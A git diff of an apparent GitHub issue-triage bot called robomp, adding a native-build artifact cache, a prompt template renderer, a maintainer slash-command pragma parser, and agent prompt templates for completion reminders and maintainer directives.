delivery_id: str, + *, + poll_interval: float = 2.0, + timeout: float | None = None, +) -> EventRow | None: + """Block until the event row reaches a terminal state, vanishes, or times out. + + Pure DB polling — the caller MUST NOT spawn its own ``WorkerPool``; the + long-lived ``serve`` process is the only owner of the dispatcher loop. + Returns the final row, or ``None`` if the row was deleted while waiting. + Raises ``ManualTriageTimeout`` if ``timeout`` elapses first. + """ + deadline = None if timeout is None else time.monotonic() + timeout + while True: + row = db.get_event(delivery_id) + if row is None: + return None + if row.state in _TERMINAL_STATES: + return row + + sleep_for = poll_interval + if deadline is not None: + remaining = deadline - time.monotonic() + if remaining <= 0: + assert timeout is not None + raise ManualTriageTimeout(delivery_id, row.state, timeout) + sleep_for = min(poll_interval, remaining) + await asyncio.sleep(sleep_for) + + +__all__ = [ + "InvalidIssueRef", + "ManualTriageError", + "ManualTriageConflict", + "ManualTriageTimeout", + "await_terminal_state", + "build_issues_opened_payload", + "enqueue_manual_triage", + "manual_delivery_id", + "parse_issue_ref", +] diff --git a/python/robomp/src/natives_cache.py b/python/robomp/src/natives_cache.py new file mode 100644 index 000000000..f322475a5 --- /dev/null +++ b/python/robomp/src/natives_cache.py @@ -0,0 +1,485 @@ +"""Content-addressed cache of pre-built ``packages/natives/native/`` artifacts. + +The napi-rs build of ``pi_natives.<platform>-<arch>[-variant].node`` takes +minutes. Most issues never touch ``crates/``, so the same artifact is +buildable in every workspace whose source state matches one we've already +built. This module: + +1. Computes a deterministic key from the git tree-hashes of the inputs that + determine the build output, plus the target triple. +2. On workspace populate: hardlinks cached files into the worktree's + ``packages/natives/native/`` (a noop on cache miss). +3. On successful task exit: captures the workspace's freshly-built artifacts + into the cache under its (possibly new) key. + +Hardlink semantics give COW for free: every tool in the napi build path +replaces files via write-temp + rename, so a workspace rebuilding the addon +allocates a new inode and leaves the cached file untouched. Cache GC is by +LRU on ``manifest.json.captured_at``; hardlinked workspaces keep the inode +alive after the cache directory is rmtree'd. + +Ownership: cache root is provisioned ``root:omp 02770`` by ``entrypoint.sh`` +so slot subprocesses (group ``omp``) can capture under setgid inheritance. +Same shape as ``/data/cache/cargo``. +""" + +from __future__ import annotations + +import errno +import fcntl +import hashlib +import json +import logging +import os +import platform +import shutil +import subprocess +import sys +import time +from collections.abc import Generator +from contextlib import contextmanager +from dataclasses import dataclass +from pathlib import Path +from typing import IO + +log = logging.getLogger(__name__) + + +# Paths whose git tree-hash feeds the cache key. Order is significant — the +# hash incorporates the (path, tree_hash) pairs in this exact order so a +# different ordering would produce a different key. Cover every input the +# napi build reads: all workspace crates (pi-natives transitively depends on +# pi-ast/pi-iso/pi-shell), the workspace Cargo manifest + lock, the rust +# toolchain pin, and the natives package itself (build script + scripts/* + +# package.json with napi config). +CACHE_KEY_PATHS: tuple[str, ...] = ( + "crates", + "Cargo.lock", + "Cargo.toml", + "rust-toolchain.toml", + "packages/natives", +) + +# Files in ``packages/natives/native/`` that ARE pure functions of the +# cache-key inputs and travel as a unit. ``.node`` is matched by glob since +# the basename embeds the target triple + variant. +_CACHED_NODE_GLOB = "pi_natives.*.node" +_CACHED_COMPANION_FILES: tuple[str, ...] = ( + "index.d.ts", + "index.js", + "embedded-addon.js", +) +_MANIFEST_FILENAME = "manifest.json" +_LOCKFILE_NAME = ".lock" + +_NULL_TREE_HASH = "0" * 40 # placeholder for paths missing from HEAD + + +def _normalize_platform() -> str: + """Mirror node's ``process.platform`` so the cache key matches + ``build-native.ts``'s filename convention.""" + s = sys.platform + if s.startswith("linux"): + return "linux" + if s == "darwin": + return "darwin" + if s in ("win32", "cygwin"): + return "win32" + return s + + +def _normalize_arch() -> str: + """Mirror node's ``process.arch``.""" + m = platform.machine().lower() + if m in ("x86_64", "amd64"): + return "x64" + if m in ("aarch64", "arm64"): + return "arm64" + return m + + +def target_triple() -> str: + """``<platform>-<arch>[-<variant>]`` matching the napi addon basename. + + ``TARGET_VARIANT`` is honored only on x64 (the build script enforces the + same restriction). On x64 hosts that leave the variant unset we encode + ``host`` to keep the key stable across workspaces on the same machine + without trying to autodetect AVX2 from Python. + """ + plat = _normalize_platform() + arch = _normalize_arch() + if arch != "x64": + return f"{plat}-{arch}" + variant = os.environ.get("TARGET_VARIANT", "").strip() or "host" + return f"{plat}-{arch}-{variant}" + + +def _git_safe_directory_env(repo_dir: Path) -> dict[str, str]: + """Env overlay that whitelists ``repo_dir`` for git's safe.directory check. + + The orchestrator runs as root but workspaces are owned by the slot UID + (see ``SandboxManager._chown_workspace``). Without this whitelist, every + git invocation from the orchestrator on a slot-owned repo aborts with + "fatal: detected dubious ownership". Mirrors + ``robomp.sandbox._safe_directory_env`` but kept local to avoid a circular + import (sandbox imports this module). + """ + env = os.environ.copy() + count = int(env.get("GIT_CONFIG_COUNT", "0")) + env[f"GIT_CONFIG_KEY_{count}"] = "safe.directory" + env[f"GIT_CONFIG_VALUE_{count}"] = str(repo_dir) + env["GIT_CONFIG_COUNT"] = str(count + 1) + return env + + +def compute_key(repo_dir: Path, *, target: str | None = None) -> str: + """Deterministic sha256 over the git tree-hashes of cache-key paths. + + Uses ``git cat-file --batch-check`` for one subprocess invocation. Missing + paths fold in as a fixed null hash so the key remains deterministic + across repos that don't ship every input file. + + Raises ``subprocess.CalledProcessError`` if ``git`` itself fails (e.g. + not a repo) — callers SHOULD treat that as "no cache" and proceed. + """ + tgt = target if target is not None else target_triple() + stdin = "".join(f"HEAD:{p}\n" for p in CACHE_KEY_PATHS) + proc = subprocess.run( + ["git", "cat-file", "--batch-check"], + input=stdin, + cwd=str(repo_dir), + text=True, + capture_output=True, + check=True, + env=_git_safe_directory_env(repo_dir), + ) + lines = proc.stdout.splitlines() + if len(lines) != len(CACHE_KEY_PATHS): + raise RuntimeError( + f"git cat-file returned {len(lines)} lines, expected {len(CACHE_KEY_PATHS)}: {proc.stdout!r}" + ) + h = hashlib.sha256() + for path, line in zip(CACHE_KEY_PATHS, lines, strict=True): + stripped = line.strip() + if stripped.endswith("missing"): + tree_hash = _NULL_TREE_HASH + else: + # "<hash> <type> <size>" — take the first token as the tree/blob hash. + tree_hash = stripped.split(None, 1)[0] + h.update(f"{path}\t{tree_hash}\n".encode()) + h.update(f"TARGET\t{tgt}\n".encode()) + return h.hexdigest() + + +def _repo_slug(repo: str) -> str: + """Same convention as ``SandboxManager.pool_path``.""" + return repo.replace("/", "__") + + +def _atomic_link(src: Path, dst: Path) -> None: + """Hardlink ``src`` → ``dst``, replacing any existing ``dst`` atomically. + + Falls back to ``shutil.copy2`` on ``EXDEV`` (cross-filesystem). The + replace semantics use a sibling temp file + ``os.replace`` so a crash + mid-link doesn't leave ``dst`` half-overwritten. + """ + dst.parent.mkdir(parents=True, exist_ok=True) + tmp = dst.with_suffix(dst.suffix + f".tmp.{os.getpid()}") + try: + try: + os.link(src, tmp) + except OSError as exc: + if exc.errno != errno.EXDEV: + raise + shutil.copy2(src, tmp) + os.replace(tmp, dst) + finally: + # Best-effort cleanup if os.link succeeded but os.replace blew up. + try: + tmp.unlink() + except FileNotFoundError: + pass + + +def _atomic_copy(src: Path, dst: Path) -> None: + """Copy ``src`` → ``dst`` via a sibling temp file + ``os.replace``. + + Used for cached files that downstream tools rewrite via + ``open(..., 'w')`` (in-place truncate). Replacing the workspace dst + atomically means a fresh inode every populate — the cache file is + never mutated through a hardlink. + """ + dst.parent.mkdir(parents=True, exist_ok=True) + tmp = dst.with_suffix(dst.suffix + f".tmp.{os.getpid()}") + try: + shutil.copy2(src, tmp) + os.replace(tmp, dst) + finally: + try: + tmp.unlink() + except FileNotFoundError: + pass + + +@contextmanager +def _flock(path: Path) -> Generator[IO[bytes]]: + """Exclusive ``fcntl.flock`` on ``path`` (created if missing). + + ``flock`` is advisory but every caller goes through ``NativesCache``, so + cooperative locking is sufficient. POSIX-only — Windows is not a target. + """ + path.parent.mkdir(parents=True, exist_ok=True) + fh = open(path, "ab+") # noqa: SIM115 — managed by the context manager + try: + fcntl.flock(fh.fileno(), fcntl.LOCK_EX) + yield fh + finally: + try: + fcntl.flock(fh.fileno(), fcntl.LOCK_UN) + finally: + fh.close() + + +@dataclass(slots=True, frozen=True) +class CacheHit: + """Files copied/linked into the workspace by ``populate_workspace``.""" + + cache_dir: Path + files: tuple[Path, ...] + + +class NativesCache: + """Per-repo content-addressed cache of pi-natives build outputs.""" + + def __init__( + self, + root: Path, + *, + max_entries_per_repo: int = 8, + max_bytes: int = 4 * 1024**3, + ) -> None: + self.root = root + self.max_entries_per_repo = max(1, max_entries_per_repo) + self.max_bytes = max(0, max_bytes) + root.mkdir(parents=True, exist_ok=True) + + # ---- layout helpers ---- + def repo_root(self, repo: str) -> Path: + return self.root / _repo_slug(repo) + + def entry_dir(self, repo: str, key: str) -> Path: + return self.repo_root(repo) / key + + def lockfile(self, repo: str) -> Path: + return self.repo_root(repo) / _LOCKFILE_NAME + + # ---- query ---- + def lookup(self, repo: str, key: str) -> Path | None: + """Return the cache directory if ``key`` is present and complete.""" + entry = self.entry_dir(repo, key) + if not (entry / _MANIFEST_FILENAME).exists(): + return None + # A complete entry has a node file plus all companions. + if not list(entry.glob(_CACHED_NODE_GLOB)): + return None + for name in _CACHED_COMPANION_FILES: + if not (entry / name).exists(): + return None + return entry + + # ---- populate (workspace ← cache) ---- + def populate_workspace( + self, + repo: str, + key: str, + native_dir: Path, + ) -> CacheHit | None: + """Hardlink the `.node`, copy companions, into ``native_dir``. + + Returns the ``CacheHit`` on a hit; ``None`` on miss. Caller has + already computed ``key`` and verified ``native_dir`` exists. + + Why hardlink the .node but COPY the companions: the napi build's + ``installBinary`` replaces the .node via temp + rename (new inode, + cache safe), but ``installGeneratedBindings`` and ``gen-enums.ts`` + rewrite ``index.d.ts`` / ``index.js`` / ``embedded-addon.js`` with + plain ``open(..., 'w')`` — that's open-truncate-write IN PLACE on + Linux. A hardlinked companion would propagate the truncate into the + cache. Copies are independent inodes and absorb the rewrite safely. + """ + entry = self.lookup(repo, key) + if entry is None: + return None + native_dir.mkdir(parents=True, exist_ok=True) + copied: list[Path] = [] + for src in entry.glob(_CACHED_NODE_GLOB): + dst = native_dir / src.name + _atomic_link(src, dst) + copied.append(dst) + for name in _CACHED_COMPANION_FILES: + src = entry / name + dst = native_dir / name + _atomic_copy(src, dst) + copied.append(dst) + return CacheHit(cache_dir=entry, files=tuple(copied)) + + # ---- capture (cache ← workspace) ---- + def capture( + self, + repo: str, + key: str, + native_dir: Path, + *, + source_workspace: str | None = None, + commit: str | None = None, + ) -> Path | None: + """Atomically capture ``native_dir`` contents under ``key``. + + Returns the final cache directory on store, ``None`` if there was + nothing to capture or if another worker already populated the same + key (idempotent under flock). + """ + node_files = sorted(native_dir.glob(_CACHED_NODE_GLOB)) + if not node_files: + return None + # Every companion must exist or the entry would be incomplete. + for name in _CACHED_COMPANION_FILES: + if not (native_dir / name).exists(): + return None + + repo_root = self.repo_root(repo) + repo_root.mkdir(parents=True, exist_ok=True) + with _flock(self.lockfile(repo)): + # TOCTOU recheck: another worker may have captured the same key + # while we waited on the lock. + if self.lookup(repo, key) is not None: + return self.entry_dir(repo, key) + + final = self.entry_dir(repo, key) + staging = repo_root / f".{key}.tmp.{os.getpid()}" + if staging.exists(): + shutil.rmtree(staging, ignore_errors=True) + staging.mkdir(parents=True) + try: + # NOTE: capture uses COPY, not hardlink. Hardlinking a + # slot-owned workspace file into the cache would preserve + # the slot's ownership on the cached inode — defeating + # the setgid `omp` model that lets other slots read it. + # A copy creates a fresh inode owned by the orchestrator + # (root) and inherits gid `omp` from the setgid 2770 + # cache root. + for src in node_files: + _atomic_copy(src, staging / src.name) + for name in _CACHED_COMPANION_FILES: + _atomic_copy(native_dir / name, staging / name) + manifest = { + "key": key, + "target": target_triple(), + "captured_at": time.time(), + "source_workspace": source_workspace, + "commit": commit, + "node_files": [src.name for src in node_files], + } + (staging / _MANIFEST_FILENAME).write_text( + json.dumps(manifest, indent=2, sort_keys=True), encoding="utf-8" + ) + os.replace(staging, final) + except Exception: + shutil.rmtree(staging, ignore_errors=True) + raise + self._gc_locked(repo) + return final + + # ---- gc ---- + def gc(self, repo: str | None = None) -> int: + """Evict entries beyond per-repo or total caps. + + ``repo`` scopes to one repo when given; otherwise sweeps every repo + directory under ``root``. Returns the count of evicted entries. + """ + if repo is not None: + with _flock(self.lockfile(repo)): + return self._gc_locked(repo) + total = 0 + if not self.root.exists(): + return 0 + for child in self.root.iterdir(): + if not child.is_dir(): + continue + # Reconstruct repo identifier from directory name (best-effort; + # only used for lockfile path, not for any externally-visible + # identifier). + repo_name = child.name.replace("__", "/", 1) + try: + with _flock(self.lockfile(repo_name)): + total += self._gc_locked(repo_name) + except OSError as exc: + log.warning("natives_cache gc skip", extra={"repo": child.name, "err": str(exc)}) + return total + + def _gc_locked(self, repo: str) -> int: + """Caller MUST hold the per-repo flock.""" + repo_root = self.repo_root(repo) + if not repo_root.exists(): + return 0 + entries: list[tuple[float, int, Path]] = [] + for child in repo_root.iterdir(): + if not child.is_dir(): + # Stale staging dirs (".<key>.tmp.<pid>") from a crashed + # capture: drop them opportunistically. + continue + if child.name.startswith("."): + shutil.rmtree(child, ignore_errors=True) + continue + manifest_path = child / _MANIFEST_FILENAME + if not manifest_path.exists(): + # Incomplete entry — evict. + shutil.rmtree(child, ignore_errors=True) + continue + try: + manifest = json.loads(manifest_path.read_text(encoding="utf-8")) + captured_at = float(manifest.get("captured_at", 0.0)) + except (OSError, ValueError, json.JSONDecodeError): + captured_at = manifest_path.stat().st_mtime + size = _dir_size(child) + entries.append((captured_at, size, child)) + entries.sort(key=lambda row: row[0]) # oldest first + + evicted = 0 + # 1. Per-repo entry-count cap (drop oldest). + while len(entries) > self.max_entries_per_repo: + _, _, victim = entries.pop(0) + shutil.rmtree(victim, ignore_errors=True) + evicted += 1 + + # 2. Per-repo byte cap (drop oldest until under). + if self.max_bytes > 0: + total = sum(size for _, size, _ in entries) + while total > self.max_bytes and len(entries) > 1: + _, size, victim = entries.pop(0) + shutil.rmtree(victim, ignore_errors=True) + total -= size + evicted += 1 + return evicted + + +def _dir_size(path: Path) -> int: + """Sum of file sizes under ``path``. Symlinks counted as their lstat + size (not the target). Errors swallowed — GC is best-effort.""" + total = 0 + for root, _dirs, files in os.walk(path): + for name in files: + try: + total += os.lstat(os.path.join(root, name)).st_size + except OSError: + pass + return total + + +__all__ = [ + "CACHE_KEY_PATHS", + "CacheHit", + "NativesCache", + "compute_key", + "target_triple", +] diff --git a/python/robomp/src/persona.py b/python/robomp/src/persona.py new file mode 100644 index 000000000..8164c2df5 --- /dev/null +++ b/python/robomp/src/persona.py @@ -0,0 +1,355 @@ +"""Prompt template loader + renderer. + +Templates use a tiny mustache-style `{{path.to.value}}` placeholder. We do not +import a real template engine: the substitution rules are deliberately +restrictive so a malformed prompt is impossible to render with surprising +side-effects. +""" + +from __future__ import annotations + +import re +import tomllib +from collections.abc import Mapping +from functools import cache +from importlib import resources +from typing import Any + +from robomp.github_client import CommentInfo, IssueInfo, RepoInfo +from robomp.sandbox import Workspace + +_PLACEHOLDER = re.compile(r"\{\{\s*([a-zA-Z0-9_.]+)\s*\}\}") + + +def _lookup(path: str, scope: Mapping[str, Any]) -> str: + parts = path.split(".") + value: Any = scope + for part in parts: + if isinstance(value, Mapping): + value = value.get(part) + else: + value = getattr(value, part, None) + if value is None: + return "" + if isinstance(value, (list, tuple)): + return ", ".join(str(item) for item in value) + return str(value) + + +def render(template: str, scope: Mapping[str, Any]) -> str: + return _PLACEHOLDER.sub(lambda m: _lookup(m.group(1), scope), template) + + +@cache +def _load(name: str) -> str: + return resources.files("robomp.prompts").joinpath(name).read_text(encoding="utf-8") + + +@cache +def _load_toml(name: str) -> Mapping[str, Any]: + data = tomllib.loads(_load(name)) + if not isinstance(data, Mapping): + raise ValueError(f"prompt data file {name!r} must contain a TOML table") + return data + + +def _require_mapping(value: Any, context: str) -> Mapping[str, Any]: + if not isinstance(value, Mapping): + raise ValueError(f"{context} must be a table") + return value + + +def _require_nonempty_str(value: Any, context: str) -> str: + if not isinstance(value, str) or not value.strip(): + raise ValueError(f"{context} must be a non-empty string") + return value + + +def seed_phases(task_kind: str) -> list[dict[str, Any]]: + raw_phases = _load_toml("todo_phases.toml").get(task_kind, []) + if not isinstance(raw_phases, list): + raise ValueError(f"todo_phases.toml[{task_kind!r}] must be a list of phases") + + phases: list[dict[str, Any]] = [] + for phase_index, raw_phase in enumerate(raw_phases): + phase = _require_mapping(raw_phase, f"todo_phases.toml[{task_kind!r}][{phase_index}]") + name = _require_nonempty_str( + phase.get("name"), + f"todo_phases.toml[{task_kind!r}][{phase_index}].name", + ) + raw_tasks = phase.get("tasks") + if not isinstance(raw_tasks, list) or not raw_tasks: + raise ValueError(f"todo_phases.toml[{task_kind!r}][{phase_index}].tasks must be a non-empty list") + tasks = [ + _require_nonempty_str( + task, + f"todo_phases.toml[{task_kind!r}][{phase_index}].tasks[{task_index}]", + ) + for task_index, task in enumerate(raw_tasks) + ] + phases.append({"name": name, "tasks": tasks}) + return phases + + +def _host_tool_entry(tool_name: str) -> Mapping[str, Any]: + return _require_mapping( + _load_toml("host_tools.toml").get(tool_name), + f"host_tools.toml[{tool_name!r}]", + ) + + +def host_tool_description(tool_name: str) -> str: + return _require_nonempty_str( + _host_tool_entry(tool_name).get("description"), + f"host_tools.toml[{tool_name!r}].description", + ) + + +def host_tool_parameter_description(tool_name: str, parameter_name: str) -> str: + parameters = _require_mapping( + _host_tool_entry(tool_name).get("parameters"), + f"host_tools.toml[{tool_name!r}].parameters", + ) + return _require_nonempty_str( + parameters.get(parameter_name), + f"host_tools.toml[{tool_name!r}].parameters[{parameter_name!r}]", + ) + + +def classify_next_step(primary: str) -> str: + steps = _require_mapping( + _host_tool_entry("classify_issue").get("next_steps"), + "host_tools.toml['classify_issue'].next_steps", + ) + return _require_nonempty_str( + steps.get(primary), + f"host_tools.toml['classify_issue'].next_steps[{primary!r}]", + ) + + +def system_append(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str: + return render(_load("system_append.md"), {"repo": repo, "issue": issue, "workspace": workspace}) + + +def kickoff(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str: + return render(_load("kickoff_issue.md"), {"repo": repo, "issue": issue, "workspace": workspace}) + + +def resume_triage(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str: + """Resume prompt for a `triage_issue` task whose omp session already exists.""" + return render(_load("resume_triage.md"), {"repo": repo, "issue": issue, "workspace": workspace}) + + +def completion_reminder(*, repo: RepoInfo, issue: IssueInfo, workspace: Workspace) -> str: + """Reminder injected when a triage turn ends before a terminal tool fired.""" + return render(_load("completion_reminder.md"), {"repo": repo, "issue": issue, "workspace": workspace}) + + +def _render_thread(messages: tuple) -> str: + """Render a `tuple[ThreadMessage, ...]` as a markdown block for prompt embed. + + Duck-typed: any object with `.kind / .author / .body / .created_at` and + optional `.path / .line / .state` works. Kept here (not in worker.py) so + persona owns the prompt-shape. + """ + if not messages: + return "(no prior conversation)" + parts: list[str] = [] + for m in messages: + kind = getattr(m, "kind", "comment") + author = getattr(m, "author", "") or "unknown" + body = getattr(m, "body", "") or "" + ts = getattr(m, "created_at", "") or "" + if kind in ("issue_body", "pr_body"): + header = f"### @{author} — {'PR body' if kind == 'pr_body' else 'issue body'}" + elif kind == "review_comment": + path = getattr(m, "path", None) + line = getattr(m, "line", None) + anchor = f"`{path}`" + (f":L{line}" if isinstance(line, int) else "") + header = f"### @{author} — review comment on {anchor}" + elif kind == "review": + state = getattr(m, "state", None) or "COMMENTED" + header = f"### @{author} — review ({state})" + else: + header = f"### @{author} — comment" + if ts: + header += f" *({ts})*" + parts.append(header) + parts.append("") + parts.append(body.rstrip()) + parts.append("") + return "\n".join(parts).rstrip() + + +def kickoff_directive( + *, + repo: RepoInfo, + issue: IssueInfo, + workspace: Workspace, + directive: Any, +) -> str: + """Kickoff for an untriaged issue that arrived via a maintainer mention. + + `directive` is duck-typed to anything with `body`, `author`, and `thread` + attributes (see `worker.DirectiveInfo`). Imported lazily to avoid a + persona → worker circular dependency. + """ + return render( + _load("kickoff_directive.md"), + { + "repo": repo, + "issue": issue, + "workspace": workspace, + "directive": {"body": directive.body, "author": directive.author}, + "thread": _render_thread(getattr(directive, "thread", ()) or ()), + }, + ) + + +def _inbound_scope(issue: IssueInfo, pr_number: int | None) -> dict[str, Any]: + """Describe the thread the inbound webhook arrived on. + + For PR conversations and review comments `pr_number` is the PR; for + regular issue comments it's None and we fall back to the issue. The + `kind` field lets prompts say "PR" or "issue" without branching in the + template engine. + """ + if pr_number is not None: + return {"kind": "PR", "number": pr_number} + return {"kind": "issue", "number": issue.number} + + +def _origin_scope(issue: IssueInfo) -> dict[str, Any]: + if issue.is_pull_request: + return {"description": "originating issue unknown; handling this PR directly"} + return {"description": f"originating issue #{issue.number}"} + + +def followup_comment( + *, + repo: RepoInfo, + issue: IssueInfo, + comment: CommentInfo, + workspace: Workspace, + pr_status: str, + pr_number: int | None = None, +) -> str: + return render( + _load("followup_comment.md"), + { + "repo": repo, + "issue": issue, + "workspace": workspace, + "comment": comment, + "state": {"pr_status": pr_status}, + "inbound": _inbound_scope(issue, pr_number), + "origin": _origin_scope(issue), + }, + ) + + +def directive( + *, + repo: RepoInfo, + issue: IssueInfo, + comment: CommentInfo, + workspace: Workspace, + directive: Any, + pr_status: str, + pr_number: int | None = None, +) -> str: + """Follow-up flavor for a comment that is a maintainer directive.""" + return render( + _load("directive.md"), + { + "repo": repo, + "issue": issue, + "workspace": workspace, + "comment": comment, + "directive": {"body": directive.body, "author": directive.author}, + "thread": _render_thread(getattr(directive, "thread", ()) or ()), + "state": {"pr_status": pr_status}, + "inbound": _inbound_scope(issue, pr_number), + "origin": _origin_scope(issue), + }, + ) + + +def followup_review( + *, + repo: RepoInfo, + workspace: Workspace, + pr_number: int, + comment_author: str, + comment_body: str, + comment_path: str, + comment_line_range: str, +) -> str: + return render( + _load("followup_review.md"), + { + "repo": repo, + "workspace": workspace, + "pr": {"number": pr_number}, + "comment": { + "author": comment_author, + "body": comment_body, + "path": comment_path, + "line_range": comment_line_range, + }, + }, + ) + + +def unable_to_reproduce_comment(*, diagnosis: str, info_needed: str) -> str: + return render( + _load("unable_to_reproduce_comment.md"), + {"diagnosis": diagnosis, "info_needed": info_needed}, + ) + + +def finalized_issue_comment() -> str: + return _load("finalized_issue_comment.md").strip() + + +def finalized_pr_comment() -> str: + return _load("finalized_pr_comment.md").strip() + + +def bare_mention_reply() -> str: + return "What would you like me to do?" + + +def question_autoclose_suffix(hours: float) -> str: + """Render the 👎-to-keep-open suffix appended to the bot's question answers. + + `hours` is rendered without trailing zeros for whole values (e.g. `4` + rather than `4.0`); fractional windows render with one decimal. + """ + if float(hours).is_integer(): + rendered = str(int(hours)) + else: + rendered = f"{hours:g}" + return render(_load("question_autoclose_suffix.md").rstrip(), {"hours": rendered}) + + +__all__ = [ + "classify_next_step", + "directive", + "finalized_issue_comment", + "finalized_pr_comment", + "followup_comment", + "followup_review", + "host_tool_description", + "host_tool_parameter_description", + "kickoff", + "kickoff_directive", + "render", + "completion_reminder", + "resume_triage", + "seed_phases", + "system_append", + "unable_to_reproduce_comment", + "bare_mention_reply", + "question_autoclose_suffix", +] diff --git a/python/robomp/src/pragmas.py b/python/robomp/src/pragmas.py new file mode 100644 index 000000000..1f5a9cd92 --- /dev/null +++ b/python/robomp/src/pragmas.py @@ -0,0 +1,181 @@ +"""Slash-command pragmas for maintainer directives. + +A *pragma* is a piece of structured metadata a maintainer attaches to a +directive comment to steer the agent run. The wire syntax is slash-commands +on their own line (chatops convention; identical surface to Slack / Discord +/ Probot): + +``` +@robomp-bot /model gpt /thinking low +fix the off-by-one in foo() +``` + +Or stacked: + +``` +@robomp-bot +/model gpt +/thinking low +fix the off-by-one +``` + +Either `/key value` or `/key=value` form is accepted. A line is consumed +**only** when every whitespace-separated token on it is a valid slash +command — that way an inline `/path/to/file` reference in prose never +accidentally tokenizes. Consumed lines are stripped from the body before the +agent ever sees them. Non-directive comments (random users) carry no +pragmas; this whole surface only applies once the comment is already trusted +as a directive (reviewer-bot or maintainer-mention). + +Supported keys (today): + +- `/model <alias>` — pick the first id in `ROBOMP_MODEL` whose model id + contains `<alias>` (case-insensitive). Falls back to the normal random + pool selection if no member matches. +- `/thinking <level>` — override `ROBOMP_THINKING` for this run. Accepts + `off|none|no`, `lo|low`, `med|medium`, `hi|high`, `xhi|xhigh` + (case-insensitive); anything else is ignored. + +Parser semantics: + +- Pure-command lines are stripped from the body. +- Mixed lines (commands + prose) are NOT consumed: the line stays verbatim + and no pragmas are extracted from it. Put commands on their own line. +- Duplicate keys keep insertion order; callers decide last-vs-first wins. +""" + +from __future__ import annotations + +import re +from typing import Literal + +ThinkingLevel = Literal["off", "low", "medium", "high", "xhigh"] + +# Key = ascii lowercase / digit / dash / underscore, must start with a letter. +# The value (when using `/key=value` form) runs to end-of-token. +_KEY_RE = re.compile(r"^[a-z][a-z0-9_-]*$", re.IGNORECASE) + + +def _parse_command_line(line: str) -> tuple[tuple[str, str], ...] | None: + """Parse one line as a sequence of slash commands. + + Returns the parsed `(key, value)` pairs, or `None` if the line is not a + pure command line (mixed content, malformed, or empty after trim). + """ + stripped = line.strip() + if not stripped or not stripped.startswith("/"): + return None + tokens = stripped.split() + pairs: list[tuple[str, str]] = [] + i = 0 + while i < len(tokens): + tok = tokens[i] + if not tok.startswith("/") or len(tok) < 2: + return None + # `/key=value` form lives inside one token. + if "=" in tok: + key, _, value = tok[1:].partition("=") + if not _KEY_RE.match(key) or not value: + return None + pairs.append((key.lower(), value)) + i += 1 + continue + # `/key value` form needs the next token as value, which must not + # itself be a command (otherwise `/key` had no value). + key = tok[1:] + if not _KEY_RE.match(key): + return None + if i + 1 >= len(tokens) or tokens[i + 1].startswith("/"): + return None + pairs.append((key.lower(), tokens[i + 1])) + i += 2 + return tuple(pairs) if pairs else None + + +def parse_pragmas(body: str) -> tuple[str, tuple[tuple[str, str], ...]]: + """Split `body` into (cleaned_body, pragmas). + + Scans line-by-line. Pure command lines are removed; everything else is + preserved verbatim, including blank lines between content. Leading and + trailing whitespace on the final body is trimmed. + """ + if not body: + return body, () + found: list[tuple[str, str]] = [] + kept: list[str] = [] + # `splitlines(keepends=True)` preserves the original line endings so we + # don't accidentally normalize CRLF. + for line in body.splitlines(keepends=True): + # Strip the trailing newline only for parsing; we'll drop the whole + # line on a match either way. + bare = line.rstrip("\r\n") + commands = _parse_command_line(bare) + if commands is None: + kept.append(line) + continue + found.extend(commands) + cleaned = "".join(kept).strip("\r\n") + return cleaned, tuple(found) + + +def pragma_value(pragmas: tuple[tuple[str, str], ...], key: str) -> str | None: + """Return the last value for `key` (last-wins), or None if absent.""" + target = key.lower() + result: str | None = None + for k, v in pragmas: + if k == target: + result = v + return result + + +def resolve_model_alias(alias: str, pool: tuple[str, ...]) -> str | None: + """Case-insensitive match of `alias` against each member of `pool`. + + Precedence: full-id exact > short-name-after-slash exact > substring. + Returns the first match in pool order, or None if nothing matches. + """ + needle = alias.strip().lower() + if not needle: + return None + exact: str | None = None + partial: str | None = None + for model in pool: + lower = model.lower() + if lower == needle: + return model + if exact is None and lower.rsplit("/", 1)[-1] == needle: + exact = model + if partial is None and needle in lower: + partial = model + return exact or partial + + +# Spelling aliases for the `/thinking` pragma. Lowercased; whitespace-stripped +# input is looked up directly. +_THINKING_ALIASES: dict[str, ThinkingLevel] = { + "off": "off", + "none": "off", + "no": "off", + "lo": "low", + "low": "low", + "med": "medium", + "medium": "medium", + "hi": "high", + "high": "high", + "xhi": "xhigh", + "xhigh": "xhigh", +} + + +def resolve_thinking_level(value: str) -> ThinkingLevel | None: + """Normalize a thinking pragma to a canonical level, or None if unknown.""" + return _THINKING_ALIASES.get(value.strip().lower()) + + +__all__ = [ + "ThinkingLevel", + "parse_pragmas", + "pragma_value", + "resolve_model_alias", + "resolve_thinking_level", +] diff --git a/python/robomp/src/prompts/completion_reminder.md b/python/robomp/src/prompts/completion_reminder.md new file mode 100644 index 000000000..8cc1cff8a --- /dev/null +++ b/python/robomp/src/prompts/completion_reminder.md @@ -0,0 +1,14 @@ +You ended your turn before finishing. + +Issue: {{repo.full_name}}#{{issue.number}} — {{issue.title}} +Branch: `{{workspace.branch}}` + +You classified this issue and reproduced the bug, but did NOT reach a terminal action. Acceptable terminal actions for a `bug` / `documentation` issue are exactly one of: + +1. `gh_push_branch` + `gh_open_pr` — you committed the fix, pushed the branch, and opened a PR. +2. `mark_unable_to_reproduce` — you genuinely cannot reproduce or fix and need maintainer input. +3. `abort_task` — unrecoverable environment failure. + +Review your TodoList and the prior tool calls, then continue from where you stopped. Do NOT re-classify, do NOT re-post the same preamble comment. If your fix is already drafted in the worktree, commit, push, and open the PR now. If you have not yet edited any source files, do the fix and continue through to PR. + +You MUST end this turn by calling one of the three terminal tools listed above. diff --git a/python/robomp/src/prompts/directive.md b/python/robomp/src/prompts/directive.md new file mode 100644 index 000000000..3cb134720 --- /dev/null +++ b/python/robomp/src/prompts/directive.md @@ -0,0 +1,40 @@ +# Directive on {{repo.full_name}}#{{inbound.number}} ({{inbound.kind}}) + +**@{{directive.author}}** posted an authoritative directive on this thread ({{origin.description}}) — either a maintainer who tagged you or a configured reviewer bot. Treat as binding. OVERRIDES any prior plan or seed todos. + +Current PR state: `{{state.pr_status}}`. + +--- + +## Prior conversation + +{{thread}} + +--- + +## Directive from @{{directive.author}} ({{comment.created_at}}) + +{{directive.body}} + +--- + +## What to do + +Read the thread first — reviewer bots (e.g. `chatgpt-codex-connector`) often reference earlier comments by line, so the directive is a delta on established context. + +Then branch on request type: + +- **Code change** → commit on 